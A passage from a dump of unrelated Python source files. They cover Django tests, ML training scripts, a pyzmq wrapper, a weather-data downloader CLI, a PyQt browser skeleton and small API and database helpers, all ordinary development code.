# An example of a ban is a case where your proxy is from New Zealand
# and the site loads a page indicating that the merchant only does business in
# North America. Since this would definitively tell you that the proxy will never
# work with the given site, the banned indicator is a means of immediately cutting
# off this proxy from the given site, instead of relying on scoring attempts to
# eventually decide that it isn't working.
response = session.put("http://url.here/api/proxy/131248", data=json_data)
if (response.status_code == 403):
print("Authentication Error. API Key was probably wrong or missing.")
elif (response.status_code == 400):
print("400. This usually means the JSON was not encoded properly.")
print(response.text)
elif (response.status_code == 204):
print("Success/Failure update was successful.")
else:
print("Unknown Failure.")
print(response.status_code)
print(response.text)
|
15,925 | 8c50bcafd0b116cc85acd3e1821dea2475c72a4a | from django.test import TestCase
from model_mommy import mommy
from examples.models import ExampleState
from projects.models import ProjectType
from projects.tests.utils import prepare_project
class TestExampleState(TestCase):
def setUp(self):
self.project = prepare_project(ProjectType.SEQUENCE_LABELING)
self.example = mommy.make("Example", project=self.project.item)
self.other = mommy.make("Example", project=self.project.item)
self.examples = self.project.item.examples.all()
def test_initial_done(self):
done = ExampleState.objects.count_done(self.examples)
self.assertEqual(done, 0)
def test_done_confirmed_by_user(self):
mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
done = ExampleState.objects.count_done(self.examples)
self.assertEqual(done, 1)
def test_done_confirmed_by_multiple_user(self):
mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
mommy.make("ExampleState", example=self.example, confirmed_by=self.project.approver)
done = ExampleState.objects.count_done(self.examples)
self.assertEqual(done, 1)
def test_done_confirmed_by_different_example(self):
mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
mommy.make("ExampleState", example=self.other, confirmed_by=self.project.approver)
done = ExampleState.objects.count_done(self.examples, self.project.admin)
self.assertEqual(done, 1)
def test_initial_user(self):
progress = ExampleState.objects.measure_member_progress(self.examples, self.project.members)
expected_progress = [{"user": member.username, "done": 0} for member in self.project.members]
self.assertEqual(progress, {"total": 2, "progress": expected_progress})
def test_user_count_after_confirmation(self):
mommy.make("ExampleState", example=self.example, confirmed_by=self.project.admin)
progress = ExampleState.objects.measure_member_progress(self.examples, self.project.members)
expected_progress = [{"user": member.username, "done": 0} for member in self.project.members]
expected_progress[0]["done"] = 1
self.assertEqual(progress, {"total": 2, "progress": expected_progress})
def test_user_count_after_multiple_user_confirmation(self):
user1 = self.project.admin
user2 = self.project.approver
mommy.make("ExampleState", example=self.example, confirmed_by=user1)
mommy.make("ExampleState", example=self.example, confirmed_by=user2)
progress = ExampleState.objects.measure_member_progress(self.examples, self.project.members)
expected_progress = [{"user": member.username, "done": 0} for member in self.project.members]
expected_progress[0]["done"] = 1
expected_progress[1]["done"] = 1
self.assertEqual(progress["total"], 2)
self.assertCountEqual(progress["progress"], expected_progress)
class TestExample(TestCase):
def test_text_project_returns_text_as_data_property(self):
project = prepare_project(ProjectType.SEQUENCE_LABELING)
example = mommy.make("Example", project=project.item)
self.assertEqual(example.text, example.data)
def test_image_project_returns_filename_as_data_property(self):
project = prepare_project(ProjectType.IMAGE_CLASSIFICATION)
example = mommy.make("Example", project=project.item)
self.assertEqual(str(example.filename), example.data)
|
15,926 | 8a716aceb8ddf618f6466377805486a7c482f3b5 | class LuasSegititiga():
def hitung(self,alas:float,tinggi:float):
return 0.5*alas*tinggi
#kubus,balok,kerucut,bola,tabung,limas segitiga,prisma segitiga |
15,927 | 44d3c523c36bb23e36a607ecece59ae0f4060567 | import torch.utils.data as data
import os
import numpy as np
# this function can be optimized
def default_flist_reader(ply_data_dir, flist):
"""
flist format: pts_file seg_file label for each line
"""
ffiles = open(flist, 'r')
lines = [line.rstrip() for line in ffiles.readlines()]
pts_files = [os.path.join(ply_data_dir, line.split()[0]) for line in lines]
seg_files = [os.path.join(ply_data_dir, line.split()[1]) for line in lines]
labels = [line.split()[2] for line in lines]
ffiles.close()
all_data = []
for pts_file_path, seg_file_path, label_id in zip(pts_files, seg_files, labels):
all_data.append((pts_file_path, seg_file_path, label_id))
return all_data # (pts_file_path, seg_file_path, label_id)
def default_loader(pts_file_path, seg_file_path):
with open(pts_file_path, 'r') as f:
pts_str = [item.rstrip() for item in f.readlines()]
pts = np.array([np.float32(s.split()) for s in pts_str], dtype=np.float32)
with open(seg_file_path, 'r') as f:
part_ids = np.array([int(item.rstrip()) for item in f.readlines()], dtype=np.uint8)
return pts, part_ids
class PlyFileList(data.Dataset):
def __init__(self, ply_data_dir,
test_ply_file_list_path,
label_id_pid2pid_in_set,
label_ids2ids, label_ids,
flist_reader=default_flist_reader,
transform=None, target_transform=None,
loader=default_loader):
self.ply_data_full_paths = flist_reader(ply_data_dir, test_ply_file_list_path)
self.label_id_pid2pid_in_set = label_id_pid2pid_in_set
self.label_ids2ids = label_ids2ids
self.label_ids = label_ids
self.transform = transform
self.target_transform = target_transform
self.loader = loader
def __getitem__(self, index):
pts_file_path, seg_file_path, label_id = self.ply_data_full_paths[index]
cur_gt_label = self.label_ids2ids[label_id]
pts_data, part_ids= self.loader(pts_file_path, seg_file_path)
# convert to seg_data
seg_data = np.array([self.label_id_pid2pid_in_set[self.label_ids[cur_gt_label]+'_'+str(x)] for x in part_ids])
if self.transform is not None:
pts_data = self.transform(pts_data)
if self.target_transform is not None:
seg_data = self.target_transform(seg_data)
return pts_data, seg_data, label_id
def __len__(self):
return len(self.ply_data_full_paths) |
15,928 | 6220c3c08af6c6db5713c5565de86f79d21f34e1 | import keras
import tensorflow as tf
import sys
import os
from tensorflow.python.keras.preprocessing.image import ImageDataGenerator #para preprocesar las imagenes
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.models import Sequential #para hacer CNN secuenciales
from tensorflow.python.keras.layers import Dropout, Flatten, Dense, Activation
from tensorflow.python.keras.layers import Convolution2D, MaxPooling2D
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import applications #modelos de entrenamiento
from sklearn.externals import joblib
from keras.callbacks import TensorBoard
import time
K.clear_session()
data_entrenamiento = './data/entrenamiento'
data_validacion = './data/validacion'
epocas=10
longitud, altura = 224, 224
batch_size = 32 #numero de imagenes a procesar en cada paso
pasos_entrenamiento = 10 #numero de veces que se procesa la informacion en cada una de las epocas
pasos_validacion = 10
filtrosConv1 = 32
filtrosConv2 = 64
tamano_filtro1 = (3, 3)
tamano_filtro2 = (2, 2)
tamano_pool = (2, 2)
clases = 2
lr = 0.002
NAME = "Adamax{}".format(time.time())
"""
callbacks fit_generator()
"""
detener = tf.keras.callbacks.EarlyStopping(monitor='val_acc', patience=epocas, mode='max')
tensorboard = tf.keras.callbacks.TensorBoard(log_dir='./graphs9/{}'.format(NAME) )
#preprocesamiento
entrenamiento_datagen = ImageDataGenerator(
rescale=1. / 255,
horizontal_flip=True)
validacion_datagen = ImageDataGenerator(rescale=1. / 255)
entrenamiento_generador = entrenamiento_datagen.flow_from_directory(
data_entrenamiento,
target_size=(altura, longitud),
batch_size=batch_size,
class_mode='categorical')
validacion_generador = validacion_datagen.flow_from_directory(
data_validacion,
target_size=(altura, longitud),
batch_size=batch_size,
class_mode='categorical')
#ajuste modelo vgg16
def modelo():
vgg=applications.vgg16.VGG16()
cnn=Sequential()
for capa in vgg.layers:
cnn.add(capa)
cnn.layers.pop()
for layer in cnn.layers:
layer.trainable=False
cnn.add(Dense(clases,activation='softmax'))
return cnn
cnn=modelo()
cnn.compile(loss='categorical_crossentropy',
optimizer=optimizers.Adamax(lr=lr),
metrics=['accuracy'])
#entrenamiento
cnn.fit_generator(
entrenamiento_generador,
steps_per_epoch=pasos_entrenamiento,
epochs=epocas,
validation_data=validacion_generador,
validation_steps=pasos_validacion,
callbacks=[tensorboard, detener])
target_dir = './modelo_cnn/'
if not os.path.exists(target_dir):
os.mkdir(target_dir)
cnn.save('./modelo_cnn/modelo2.h5')
cnn.save_weights('./modelo_cnn/pesos2.h5')
|
15,929 | dffbb97eeaf1a8d1de9dc818815fc7ce3d122f68 | from sklearn.cross_validation import cross_val_score, ShuffleSplit
from sklearn.datasets import load_boston#波士顿房屋价格预测
from sklearn.ensemble import RandomForestRegressor
import numpy as np
#集成学习ensemble库中的随机森林回归RandomForestRegressor
#Load boston housing dataset as an example
boston = load_boston()
X = boston["data"]
Y = boston["target"]
names = boston["feature_names"]
rf = RandomForestRegressor(n_estimators=20, max_depth=4)
#20个分类器,深度为4
scores = []
print(X.shape)
for i in range(X.shape[1]):#分别让每个特征与响应变量做模型分析并得到误差率
score = cross_val_score(rf, X[:, i:i+1], Y, scoring="r2",
cv=ShuffleSplit(len(X), 3, .3))
scores.append((round(np.mean(score), 3), names[i]))
print (sorted(scores, reverse=True))#对每个特征的分数排序 |
15,930 | e0c9e99f7baa7d34a2ca1661d1dacf677146284b | #!/usr/bin/env python2.7
# encoding: utf-8
# Copyright (c) 2016 Dilusense Inc. All Rights Reserved.
# all api is for frontend interface
import json
from custom_libs.custom_decorator import check_login
from flask_application import app
@app.route('/config')
def config():
return json.dumps({
'code': 0,
'data': {}
})
|
15,931 | 3f02f6789aaf4ebc9c537dc7e5f037c05e9abdf9 | from PyQt4 import QtCore, QtWebKit, QtGui
from GUI.main import BrowserGUI, BrowserTabGUI
actions = {"Alt+Left" : QtWebKit.QWebPage.Back, "Alt+Right" : QtWebKit.QWebPage.Forward, "F5" : QtWebKit.QWebPage.Reload }
class BaseBrowser(BrowserGUI):
"""
This class is the base for a simple web browser
Inherit from this class and override all the virtual methods
to make a full functional browser
"""
def __init__(self):
BrowserGUI.__init__(self)
self.connect(self.ui.tb_url, QtCore.SIGNAL("returnPressed()"), self.browse)
self.connect(self.ui.tab_pages, QtCore.SIGNAL("tabCloseRequested(int)"), self.tab_closed)
self.connect(self.ui.tab_pages, QtCore.SIGNAL("currentChanged(int)"), self.tab_changed)
# overridable methods section
def browse():
pass
def tab_closed(index):
pass
def tab_changed(index):
pass
def add_tab():
pass
class BaseBrowserTab(BrowserTabGUI):
"""
This class is the base for a browser tab
Inherit from this class and override all the virtual methods
to make a browser tab
"""
def __init__(self, parent):
BrowserTabGUI.__init__(self, parent)
self.connect(self.parent.bt_back, QtCore.SIGNAL("clicked()"), self.back)
self.connect(self.parent.bt_ahead, QtCore.SIGNAL("clicked()"), self.ahead)
self.connect(self.parent.bt_reload, QtCore.SIGNAL("clicked()"), self.reload)
self.connect(self.html, QtCore.SIGNAL("loadStarted()"), self.load_start)
self.connect(self.html, QtCore.SIGNAL("loadFinished(bool)"), self.loaded_bar)
self.connect(self.html, QtCore.SIGNAL("loadProgress(int)"), self.load_bar)
self.connect(self.html, QtCore.SIGNAL("urlChanged(const QUrl)"), self.url_changed)
# overridable methods section
def load_start(self):
pass
def load_bar(self):
pass
def loaded_bar(self):
pass
def url_changed(self):
pass
def back(self):
pass
def ahead(self):
pass
def reload():
pass
|
15,932 | ac05aa863c772b14eeb932049dca608e163e0df5 | #增加留言
import requests
from AutoInterface.configs.config import HOST
from AutoInterface.lib.apiLib.login import Login
#1--封装类
class Msg:
def add_msg(self, inToken, inData):#增加留言
'''
:param inToken: 登录接口获取的token
:param inData: 留言新增的body
:return: 响应体
'''
url = f'{HOST}/api/message'
#请求头--需要带token, --格式是字典{键:值}
header = {'X-AUTH-TOKEN': inToken, 'content-type': 'application/json'}
payload = inData
resp = requests.post(url, json=payload, headers=header)
return resp.json()
if __name__ == '__main__':
#1-登陆操作-获取token
token = Login().login({'username': '20154084', 'password': '123456'}, getToken=True)
#新增留言接口
info = {'title': '留言标题sq', 'content': '留言内容'}
res = Msg().add_msg(token, info)
print(res) #留言id可以作为后续的删除,回复操作
|
15,933 | 94ae40ea04b98126c8ae53453044addd10c357c3 | '''
Based on pyzmq-ctypes and pyzmq
Updated to work with latest ZMQ shared object
https://github.com/zeromq/pyzmq
https://github.com/svpcom/pyzmq-ctypes
'''
from zmq.bindings import *
from zmq.socket import *
from zmq.error import _check_rc, _check_ptr
import weakref
class Context(object):
def __init__(self, io_threads=1):
if not io_threads > 0:
raise ZMQError(EINVAL)
self.handle = zmq_ctx_new()
_check_ptr(self.handle)
zmq_ctx_set(self.handle, IO_THREADS, io_threads)
self._closed = False
self._sockets = set()
@property
def closed(self):
return self._closed
def _add_socket(self, socket):
ref = weakref.ref(socket)
self._sockets.add(ref)
return ref
def _rm_socket(self, ref):
if ref in self._sockets:
self._sockets.remove(ref)
def term(self):
rc = zmq_ctx_destroy(self.handle)
try:
_check_rc(rc)
except InterruptedSystemCall:
# ignore interrupted term
# see PEP 475 notes about close & EINTR for why
pass
self.handle = None
self._closed = True
def destroy(self, linger = 0):
if self.closed:
return
sockets = self._sockets
self._sockets = set()
for s in sockets:
s = s()
if s and not s.closed:
if linger is not None:
s.setsockopt(LINGER, linger)
s.close()
self.term()
def socket(self, kind):
if self._closed:
raise ZMQError(ENOTSUP)
return Socket(self, kind)
|
15,934 | 56b3c753e950ebb6592d26c5e14f96f673bbb006 | import torch
from torch import nn
import os
import pickle as pkl
import numpy as np
from typing import List
import random
exp_name = 'all_comb'
exp_dir = exp_name
save_result_dir = exp_dir + '/results/'
num_vocab = 40
end_of_sequence = num_vocab
start_of_sequence = num_vocab + 1
seq_length = 40
device = 'cuda' if torch.cuda.is_available() else 'cpu'
experiment_num_heads = 20
NUM_TRIALS = 5
num_samples = 50
num_heads = 8
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
metrics = {}
def register_metrics(metric_name):
def decorator(f):
metrics[metric_name] = f
return decorator
@register_metrics('acc')
def acc(return_dict, X, Y):
final_probs = return_dict['probs']
ans = np.argmax(final_probs, axis=-1)
return np.mean(np.equal(ans, Y[:, 1:].cpu().numpy()))
@register_metrics('attn_acc')
def attn_acc(return_dict, X, Y):
weights = return_dict['attn_weights']
attn_accs = []
for head_attn_weight in weights:
max_attn = np.argmax(head_attn_weight, axis=-1)
gold_attn = np.array([[i for i in range(seq_length)] for _ in range(X.size()[0])])
attn_accs.append(np.mean(np.equal(max_attn[:, :-1], gold_attn)))
return attn_accs
@register_metrics('attn_acc_m1')
def attn_acc_m1(return_dict, X, Y):
weights = return_dict['attn_weights']
attn_accs = []
for head_attn_weight in weights:
max_attn = np.argmax(head_attn_weight, axis=-1)
gold_attn = np.array([[i + 1 for i in range(seq_length)] for _ in range(X.size()[0])])
attn_accs.append(np.mean(np.equal(max_attn[:, :-1], gold_attn)))
return attn_accs
def numpify_dict(d):
result = {}
result['logits'] = d['logits'].cpu().detach().numpy()
result['probs'] = d['probs'].cpu().detach().numpy()
result['attn_weights'] = [x.cpu().detach().numpy() for x in d['attn_weights']]
return result
def eval_acc(m, val_set):
m.eval()
X, Y = val_set
X, Y = torch.tensor(X).to(device), torch.tensor(Y).to(device)
return_dict = numpify_dict(m(X, Y[:, :-1]))
eval_dict = {}
for key in metrics:
eval_dict[key] = metrics[key](return_dict, X, Y)
m.train()
return eval_dict
def generate_seq(num_samples):
X, Y = [], []
for _ in range(num_samples):
arr = [_ for _ in range(num_vocab)]
random.shuffle(arr)
x = np.array(arr[:seq_length])
x = np.concatenate((x, [end_of_sequence]))
y = np.concatenate(([start_of_sequence], x))
X.append(x)
Y.append(y)
return np.array(X), np.array(Y)
if not os.path.exists(exp_dir):
os.mkdir(exp_dir)
if not os.path.exists(save_result_dir):
os.mkdir(save_result_dir)
class Attn_head(nn.Module):
def __init__(self, save_path=None):
super(Attn_head, self).__init__()
self.attn_proj = nn.Linear(hidden_dim, hidden_dim)
self.enc_proj = nn.Linear(hidden_dim, hidden_dim)
if save_path is not None:
self.load_state_dict(torch.load(save_path))
class Seq2Seq(nn.Module):
def __init__(self):
super(Seq2Seq, self).__init__()
self.enc_embedding, self.dec_embedding = [nn.Embedding(num_vocab + 2, hidden_dim) for _ in range(2)]
self.encoder_rnn, self.decoder_rnn = [nn.GRU(hidden_dim, hidden_dim) for _ in range(2)]
self.out_lin = nn.Linear(hidden_dim, num_vocab + 2)
self.sm = nn.Softmax(dim=-1)
self.after_decoder_hidden = nn.Linear(hidden_dim * 2, hidden_dim)
self.act = nn.Tanh()
def set_attn(self, attn_heads: List[Attn_head]):
self.attn_heads = nn.ModuleList(attn_heads)
self.num_heads = len(attn_heads)
def forward(self, X, Y_in):
X, Y_in = X.T, Y_in.T
enc_emb, dec_emb = self.enc_embedding(X), self.dec_embedding(Y_in)
encoder_hidden, last = self.encoder_rnn(enc_emb)
decoder_hidden, _ = self.decoder_rnn(dec_emb, last)
attn_feats = [attn_head.attn_proj(decoder_hidden) for attn_head in self.attn_heads]
attn_distrs = [self.sm(torch.einsum("tbf,sbf->bts", [attn_feat, encoder_hidden])) for attn_feat in attn_feats]
context_vs = [torch.einsum("bts,sbf->tbf", [attn_distr, encoder_hidden]) for attn_distr in attn_distrs]
all_context = torch.cat([attn_head.enc_proj(context_v).unsqueeze(0) for context_v, attn_head in zip(context_vs, self.attn_heads)], axis=0)
context_v_agg = torch.mean(all_context, axis=0)
last_hidden = self.act(self.after_decoder_hidden(torch.cat((context_v_agg, decoder_hidden), dim=-1)))
logits = self.out_lin(last_hidden).transpose(1, 0)
return {
"logits": logits,
"probs": self.sm(logits),
"attn_weights": attn_distrs
}
bsize = 128
hidden_dim = 256
num_steps = 200
eval_every = 10
val_set = generate_seq(400)
model_path = exp_dir + '/model.pt'
def can_learn(m, seed, return_history=False):
# optimizer
optim = torch.optim.Adam(m.parameters())
loss_func = nn.CrossEntropyLoss()
random.seed(seed)
history = []
for step in range(num_steps):
if step % eval_every == 0:
eval_dict = eval_acc(m, val_set)
dat = {k: v for k, v in eval_dict.items()}
dat['step'] = step
last_acc = dat['acc']
print(dat)
history.append(dat)
if last_acc > 0.95 and not return_history:
return "good"
X, Y = generate_seq(bsize)
X, Y = torch.tensor(X).to(device), torch.tensor(Y).to(device)
return_dict = m(X, Y[:, :-1])
loss = loss_func(return_dict['logits'].permute(0, 2, 1), Y[:, 1:])
loss.backward()
optim.step()
optim.zero_grad()
if not return_history:
if last_acc < 0.6:
return "bad"
return None
return history
def get_fresh_model(attn_list):
model = Seq2Seq()
model.load_state_dict(torch.load(model_path))
model.set_attn([Attn_head(attn) for attn in attn_list])
model = model.to(device)
return model
def is_good_single_head(attn):
status = None
for seed in range(3):
result = can_learn(get_fresh_model([attn]), seed)
if result is None:
return None
if status is None:
status = result
else:
if status != result:
return None
return status
def is_good_comb(attn_list, return_history):
return can_learn(get_fresh_model(attn_list), 0, return_history=return_history)
def init():
model = Seq2Seq()
torch.save(model.state_dict(), model_path)
good_count, bad_count = 0, 0
while bad_count < experiment_num_heads or good_count < experiment_num_heads:
attn = Attn_head()
cur_path = 'cur.pt'
torch.save(attn.state_dict(), cur_path)
head_init_property = is_good_single_head(cur_path)
if head_init_property == 'good':
print('A good head found')
if good_count < experiment_num_heads:
os.rename(cur_path, exp_dir + '/goodattn%d.pt' % good_count)
good_count += 1
elif head_init_property == 'bad':
print('A bad head found')
if bad_count < experiment_num_heads:
os.rename(cur_path, exp_dir + '/badattn%d.pt' % bad_count)
bad_count += 1
if os.path.exists(cur_path):
os.unlink(cur_path)
print('init finished')
def run():
random_samples = 30
random_attns = []
for random_idx in range(random_samples):
attn = Attn_head()
path = exp_dir + '/randomattn%d.pt' % random_idx
random_attns.append(path)
torch.save(attn.state_dict(), path)
bad_attns = [exp_dir + '/badattn%d.pt' % idx for idx in range(experiment_num_heads)]
good_attns = [exp_dir + '/goodattn%d.pt' % idx for idx in range(experiment_num_heads)]
good_histories, bad_histories, random_histories = {}, {}, {}
for idx in range(num_samples):
random.seed(3 * idx)
random.shuffle(bad_attns)
comb = tuple(bad_attns[:num_heads])
bad_histories[comb] = is_good_comb(comb, return_history=True)
random.seed(3 * idx + 1)
random.shuffle(bad_attns)
random.shuffle(good_attns)
comb = tuple(bad_attns[:num_heads - 1] + good_attns[:1])
good_histories[comb] = is_good_comb(comb, return_history=True)
random.seed(3 * idx + 2)
random.shuffle(random_attns)
comb = tuple(random_attns[:num_heads])
random_histories[comb] = is_good_comb(comb, return_history=True)
pkl.dump((bad_histories, good_histories, random_histories), open('re_%dheadcomb.pkl' % num_heads, 'wb'))
def all_bad(key):
for k in key:
if 'bad' not in k:
return False
return True
if __name__ == '__main__':
init()
run()
|
15,935 | a7ac7f33ea3c191b5af8ad0b74dc94a468efacd0 | import click
from src.model_data_retriever.ecmwf_request import ecmwfRetriever
from src.model_data_retriever.cds_request import cdsRetriever
from src.tools.data_tools import dataTools
@click.command()
@click.argument(
'request-file',
type=click.Path(exists=True))
@click.option(
'--dates',
'-d',
nargs=2,
type=str,
help= "date_begin and date_end of request. If not provided application will use date field from request file."
)
@click.option(
'--week_filter',
'-wf',
multiple=True,
type=str,
help= "If"
)
@click.option(
'-parallel',
'-p',
is_flag=True,
help= "If passed, parallel processing is applied."
)
@click.option(
'--num-cores',
'-nc',
show_default=True,
type=int,
help= "Number of cpu cores to be used in application"
)
@click.option(
'--mode',
show_default=True,
type=str,
help= "Select ECMWF api or CDS api."
)
def main(request_file:str, dates:str, week_filter:str ,parallel:bool, num_cores:int, mode:str="ecmwf"):
"""
Python CLI tool to download data from ECMWF's mars web api.
To use the program you should privide a path to a json file with one or more
data request in valid MARS or CDS format in it i.e:
[JSON file structure]
"request_config_0":{
"class": "s2",
"dataset": "s2s",
"date": "2021-03-01/2021-03-04/2021-03-08/2021-03-11/2021-03-15/2021-03-18/2021-03-22/2021-03-25/2021-03-29",
"expver": "prod",
"levtype": "sfc",
"model": "glob",
"origin": "ecmf",
"param": "228228",
"step": "",
"stream": "enfo",
"time": "00:00:00",
"type": "cf",
"area":"5/-90/-60/-30",
"target": "output"
},
"request_config_2":{
{'originating_centre': 'ukmo',
'system': '600',
'variable': 'total_precipitation',
'year': '2021',
'month': '09',
'day': '01',
'leadtime_hour': ['24', '48', '72', '96',
'120', '144', '168', '192',
'216', '240', '264', '288',
'312', '336', '360', '384',
'408', '432', '456', '480',
'504', '528', '552', '576',
'600', '624', '648', '672',
'696', '720', '744', '768',
'792', '816', '840', '864',
'888', '912', '936', '960',
'984', '1008', '1032', '1056',
'1080', '1104', '1128', '1152',
'1176', '1200', '1224', '1248',
'1272', '1296', '1320', '1344',
'1368', '1392', '1416', '1440',
'1464', '1488', '1512', '1536',
'1560', '1584', '1608', '1632',
'1656', '1680', '1704', '1728',
'1752', '1776', '1800', '1824',
'1848', '1872', '1896', '1920',
'1944', '1968', '1992', '2016',
'2040', '2064', '2088', '2112',
'2136', '2160', '2184', '2208',
'2232', '2256', '2280', '2304',
'2328', '2352', '2376', '2400',
'2424', '2448', '2472', '2496',
'2520', '2544', '2568', '2592',
'2616', '2640', '2664', '2688',
'2712', '2736', '2760', '2784',
'2808', '2832', '2856', '2880',
'2904', '2928', '2952', '2976',
'3000', '3024', '3048', '3072',
'3096', '3120', '3144', '3168',
'3192', '3216', '3240', '3264',
'3288', '3312', '3336', '3360',
'3384', '3408', '3432', '3456',
'3480', '3504', '3528', '3552',
'3576', '3600', '3624', '3648',
'3672', '3696', '3720', '3744',
'3768', '3792', '3816', '3840',
'3864', '3888', '3912', '3936',
'3960', '3984', '4008', '4032',
'4056', '4080', '4104', '4128',
'4152', '4176', '4200', '4224',
'4248', '4272', '4296', '4320',
'4344', '4368', '4392', '4416',
'4440', '4464', '4488', '4512',
'4536', '4560', '4584', '4608',
'4632', '4656', '4680', '4704',
'4728', '4752', '4776', '4800',
'4824', '4848', '4872', '4896',
'4920', '4944', '4968', '4992',
'5016', '5040', '5064', '5088',
'5112', '5136', '5160'],
'area': [15, -90, -60, 30],
'format': 'grib'} }
more info on how to get a valid ECMWF data request on: https://www.ecmwf.int/en/forecasts/access-forecasts/ecmwf-web-api
Usage example:
downloader.py <path-to-request-file>
"""
try:
print("File downloader is being initialized.")
tools = dataTools()
config_dict = tools.load_config_file(request_file)
if(mode == 'ecmwf'):
retriever = ecmwfRetriever()
if (dates):
click.echo(f'Date generator enabled. date_begin [{dates[0]}], date_end [{dates[1]}].')
if (week_filter):
click.echo(f'week_filter enabled: {list(week_filter)}')
date_list = tools.generate_dates(week_filter=list(week_filter))
else:
date_list = tools.generate_dates(dates[0], dates[1])
else:
dates = [None,None]
date_list = None
if (parallel):
click.echo(f'Parallel processing enabled.')
if (num_cores):
click.echo(f'Using {str(num_cores)} cores.')
retriever.parallel_retrieve(config_dict, num_cores=num_cores, date_begin=dates[0], date_end=dates[1], date_list=date_list)
else:
click.echo(f'Using {str(num_cores)} cores.')
retriever.parallel_retrieve(config_dict, date_begin=dates[0], date_end=dates[1], date_list=date_list, num_cores=2)
else:
click.echo(f'Sequential processing enabled.')
retriever.sequential_retrieve(config_dict)
elif(mode == 'cds'):
retriever = cdsRetriever()
if (dates):
click.echo(f'Date generator enabled. date_begin [{dates[0]}], date_end [{dates[1]}].')
else:
dates = [None,None]
if (parallel):
click.echo(f'Parallel processing enabled.')
if (num_cores):
click.echo(f'Using {str(num_cores)} cores.')
retriever.parallel_retrieve(config_dict, num_cores=num_cores, date_begin=dates[0], date_end=dates[1])
else:
click.echo(f'Using 2 cores.')
retriever.parallel_retrieve(config_dict, num_cores=2, date_begin=dates[0], date_end=dates[1])
else:
click.echo(f'Sequential processing enabled.')
retriever.sequential_retrieve(config_dict)
else:
raise TypeError(f'Mode should be eihter ecmwf or cds. got mode = {mode}. ')
except Exception as general_error:
print(f'Error: {general_error}')
if __name__ == "__main__":
main()
|
15,936 | 758d7f090c7616e495c1d12c83ebfdd378905345 | from Google import send_message
from ml_tracker import price_tracker
from cli import drawMenuScreen, drawConfigScreen, drawHelpScreen
from dotenv import load_dotenv
from bt_hours import weekly_check_hours
from conf import config_env_file
import os
def env_data_inputs():
print(drawConfigScreen())
MY_MAIL = input("Por favor ingresa el correo en el que deseas recibir las notificaciones: ")
WEBDRIVERPATH = input("Por favor, ingresa el nombre de tu chromedriver (recuerda que debe estar en la misma carpeta del proyecto): ")
BIG_TIME_USER = input("Por favor, ingresa tu usuario de Big Time: ")
BIG_TIME_PASSWORD = input("Por favor, ingresa tu contraseña de Bit Time: ")
config_env_file(MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD)
return MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD
def main():
option = 1
load_dotenv()
try:
MY_MAIL = os.environ['MY_MAIL']
WEBDRIVERPATH = os.environ['WEBDRIVERPATH']
BIG_TIME_USER = os.environ['BIG_TIME_USER']
BIG_TIME_PASSWORD = os.environ['BIG_TIME_PASSWORD']
except:
MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD = env_data_inputs()
while option != "s":
print(drawMenuScreen())
option = input("Ingresa la opción deseada: ")
if option == "1":
url = input("Ingresa el url de tu producto: ")
amount = float(input("Ingresa el monto a buscar: "))
condition = input("Ingresa el operador booleano de búsqueda (precio real [opeador] precio deseado): ")
mail = input("Ingresa el correo para notificar: ")
if mail == 'me':
mail = MY_MAIL
result = price_tracker(url, condition, amount, WEBDRIVERPATH)
if result:
send_message(mail, result[1], result[2])
elif option == "2":
to = input("Ingresa el correo del destinatario: ")
subject = input("Ingresa el asunto del correo: ")
message_text = input("Ingresa el cuerpo del mensaje: ")
send_message(to, subject, message_text)
elif option == "3":
if weekly_check_hours(BIG_TIME_USER, BIG_TIME_PASSWORD, WEBDRIVERPATH):
subject = "Horas registradas y enviadas correctamente"
message_text = "Me complace informarte que he cumplico con la tarea de registrar y enviar tus 40 horas de esta semana en Big Time"
else:
subject = "Tuve un error al registrar y enviar tus horas ¡CUIDADO!"
message_text = "Lamento informarte que tuve un problema al registrar y enviar tus horas, esta semana necesitarás revisarlo manualmente<br/>Puedes acceder dando clic al siguiente enlace <a href='https://intuit.bigtime.net/Bigtime/MyAccount/Session/Login'>Ir a Big Time</a><br/>O puedes copiar y pegar el siguiente enlace en tu navegador para acceder: https://intuit.bigtime.net/Bigtime/MyAccount/Session/Login"
send_message(MY_MAIL, subject, message_text)
elif option == "c":
MY_MAIL, WEBDRIVERPATH, BIG_TIME_USER, BIG_TIME_PASSWORD = env_data_inputs()
elif option == "h":
print(drawHelpScreen())
elif option == "s":
print("Un placer atenderte, vuelve pronto!")
else:
option = "1"
print("Opción inválida, favor de ingresar una opción válida")
main()
|
15,937 | 109c3a002c54666904ff132ea5725ca7800afe79 | #!/usr/bin/env python
import os.path,sys
sys.path.insert(0,os.path.join(os.path.dirname(__file__),'lib'))
from model.user import User
from lib import db_engine
from controller import main,factory,resource,log,configuration
import cherrypy
#initial Configuration for Vserver-GUI
config = os.path.join(os.path.dirname(__file__),'vserver-gui.conf')
cherrypy.config.update({
'global' : {
'tools.staticdir.root' : os.path.realpath(os.path.dirname(__file__)),
}
})
root = main.Controller()
root.setting = main.Controller()
root.factory = factory.Controller()
root.resource = resource.Controller()
root.configuration = configuration.Controller()
root.log = log.Controller()
cherrypy.quickstart(root, config=config)
|
15,938 | ffa1060bbcadd98fbb5b641754758d1fe63922d1 | from django.db.models.signals import post_save
from django.dispatch import receiver
from andr_omeda.andr_bot.models.bot import Bot
from andr_omeda.andr_bot.tasks import async_set_webhook
|
15,939 | 03913b5253818f2b4fe19421c6ef72c3b26e73fe | # models.py
from db import db
from sqlalchemy import and_
class User(db.Model):
# (设置表名)
__tablename__ = 'user_list'
# (设置主键)
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(255),)
password = db.Column(db.String(255),)
# 返回一个可以用来表示对象的可打印字符串:(相当于java的toString)
def __repr__(self):
return '<User 用户名:%r 密码:%r>' % (self.username, self.password)# 操作数据库
# 增
def add_object(user):
db.session.add(user)
db.session.commit()
print("添加 % r 完成" % user.__repr__)
# 查 (用到and的时候需要导入库from sqlalchemy import and_)
def query_object(user, query_condition_u, query_condition_p):
result = user.query.filter(and_(user.username == query_condition_u, user.password == query_condition_p))
